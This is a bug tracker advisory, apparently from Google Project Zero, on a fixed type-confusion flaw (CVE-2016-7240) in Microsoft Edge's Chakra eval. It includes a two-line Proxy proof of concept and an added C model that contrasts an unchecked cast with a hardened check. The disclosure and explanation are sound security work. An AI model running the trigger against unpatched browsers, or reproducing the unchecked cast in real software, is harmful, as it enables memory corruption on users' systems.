Status: Fixed
Closed: Nov 2016
Microsoft Edge: Type Confusion in eval
Reported by natashenka@google.com (Project Member), Sep 19 2016
In Chakra, function calls can sometimes take an extra internal argument, using the flag CallFlags_ExtraArg. The global eval function makes assumptions about the type of this extra arg, and casts it to a FrameDisplay object. If eval is called from a location in code where an extra parameter is added, for example, a Proxy function trap, and the extra parameter is of a different type, this can lead to type confusion. A full PoC is as follows and attached:

// eval wrapped in a Proxy with an empty handler: the call reaches eval
// through the Proxy call path, which supplies the extra internal argument.
var p = new Proxy(eval, {});
p("alert(\"e\")");

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Attachment: functiontrap.html (93 bytes)
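A schematic model of the bug class the report describes, added here as an illustration and not ChakraCore's code: a callee trusts a call flag and casts the extra argument to one object type without checking what the caller actually passed. All type names, flag values and layouts (ObjHeader, FrameDisplay, OtherObject, CallInfo, the scope_count field) are invented assumptions; the hardened variant shows the check a defender would expect before the cast.

```c
/* Schematic model of the bug class in the report above: a callee trusts a
 * call flag and casts the "extra" argument to one object type without
 * checking what the caller really passed. All names and layouts here are
 * invented for illustration; this is not ChakraCore code. */
#include <stddef.h>
#include <stdint.h>

enum { CALLFLAGS_NONE = 0, CALLFLAGS_EXTRAARG = 1 };
enum ObjType { OBJ_FRAMEDISPLAY = 1, OBJ_OTHER = 2 };

typedef struct { enum ObjType type; } ObjHeader;            /* every object carries a tag */
typedef struct { ObjHeader hdr; int32_t scope_count; } FrameDisplay;
typedef struct { ObjHeader hdr; int32_t caller_data; } OtherObject;  /* same size, different meaning */
typedef struct { unsigned flags; void *extra_arg; } CallInfo;

/* Vulnerable: whenever the flag is set, assume the extra argument is a FrameDisplay. */
int eval_scope_count_vulnerable(const CallInfo *ci) {
    if (!(ci->flags & CALLFLAGS_EXTRAARG)) return 0;
    const FrameDisplay *fd = (const FrameDisplay *)ci->extra_arg;  /* unchecked cast */
    return fd->scope_count;  /* interprets whatever object was passed as a scope count */
}

/* Hardened: check the object's tag before casting; return 0 (failure) on mismatch. */
int eval_scope_count_checked(const CallInfo *ci, int32_t *out) {
    if (!(ci->flags & CALLFLAGS_EXTRAARG) || ci->extra_arg == NULL) { *out = 0; return 1; }
    const ObjHeader *h = (const ObjHeader *)ci->extra_arg;
    if (h->type != OBJ_FRAMEDISPLAY) return 0;  /* a caller passed something else: refuse */
    *out = ((const FrameDisplay *)h)->scope_count;
    return 1;
}

/* Constructed callers: a normal one and one that supplies a non-FrameDisplay extra argument. */
int vulnerable_sees_normal_caller(void) {
    FrameDisplay fd = { { OBJ_FRAMEDISPLAY }, 2 };
    CallInfo ci = { CALLFLAGS_EXTRAARG, &fd };
    return eval_scope_count_vulnerable(&ci);       /* 2, as intended */
}
int vulnerable_sees_confused_caller(void) {
    OtherObject other = { { OBJ_OTHER }, 4096 };
    CallInfo ci = { CALLFLAGS_EXTRAARG, &other };
    return eval_scope_count_vulnerable(&ci);       /* 4096: caller_data read as scope_count */
}
int checked_rejects_confused_caller(int32_t *out) {
    OtherObject other = { { OBJ_OTHER }, 4096 };
    CallInfo ci = { CALLFLAGS_EXTRAARG, &other };
    return eval_scope_count_checked(&ci, out);     /* 0: refused before the cast */
}
```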
Comment 1 by natashenka@google.com (Project Member), Nov 17 2016
Labels: -Restrict-View-Commit CVE-2016-7240
Status: Fixed
Fixed in November update